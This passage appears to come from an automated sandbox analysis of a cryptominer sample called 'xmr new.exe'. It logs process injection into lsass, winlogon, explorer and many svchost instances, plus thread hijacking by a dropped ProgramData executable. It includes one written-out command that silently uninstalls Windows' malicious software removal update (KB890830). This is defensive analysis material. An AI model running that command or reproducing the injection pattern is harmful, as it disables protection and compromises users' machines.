        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 55C0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A07B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2125273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E859273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52F2273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 90BB273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C4CC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1F9A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1F97273C
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385B90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2911C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E255D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2919C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E25F00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FB53990000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F2BD130000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F8B70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2938BA00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2258F3D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F54840000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B76580000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1265E790000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18510D30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2B70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2389D0D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E66FD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D6530000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20763780000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200FF1A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC6130000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 266F1070000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26008BB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E54DA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CF20530000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19EA6340000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC464E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15B351A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C38C460000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC09A40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C73F910000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1616A5B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181C5E90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18E3AF30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DA05C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C9B0460000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23A7CF40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184FCB80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CF1CE30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1697C550000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0FE010000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC093B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8004E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 118D8250000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27687590000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19292570000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221CFED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E7A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 15DAA130000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19605730000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87F1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20ECB6C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2DA0CB00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2B392000000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23F55C00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E8A07B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2E321250000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19BE8590000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 17F90BB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 230C4CC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F970000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F9A0000 value starts with: 4D5A
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\dialer.exeMemory written: PID: 3504 base: B40000 value: 4D
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\xmr new.exeThread register set: target process: 3412Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeThread register set: target process: 4196Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeThread register set: target process: 4864Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeThread register set: target process: 1532Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385B90000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2911C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E255D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0EF0000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252E10000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252540000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2919C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E25F00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0F20000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FB53990000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F2BD130000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F8B70000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2938BA00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2258F3D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F54840000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B76580000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1265E790000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18510D30000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2B70000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2389D0D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E66FD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D6530000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20763780000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200FF1A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC6130000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 266F1070000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26008BB0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E54DA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CF20530000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19EA6340000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A50000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC464E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15B351A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C38C460000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC09A40000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C73F910000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1616A5B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181C5E90000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18E3AF30000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DA05C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C9B0460000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23A7CF40000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184FCB80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CF1CE30000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1697C550000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0FE010000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC093B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8004E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 118D8250000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27687590000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B40000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19292570000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221CFED0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E7A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 15DAA130000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD40000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19605730000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87F1C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20ECB6C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2DA0CB00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2B392000000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23F55C00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E8A07B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2E321250000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19BE8590000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252F20000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 17F90BB0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 230C4CC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F970000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F9A0000
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: dwm.exe, 0000002A.00000000.1546562653.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000002.2805237393.00000283DB78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BA36F0 cpuid 31_2_000001F385BA36F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
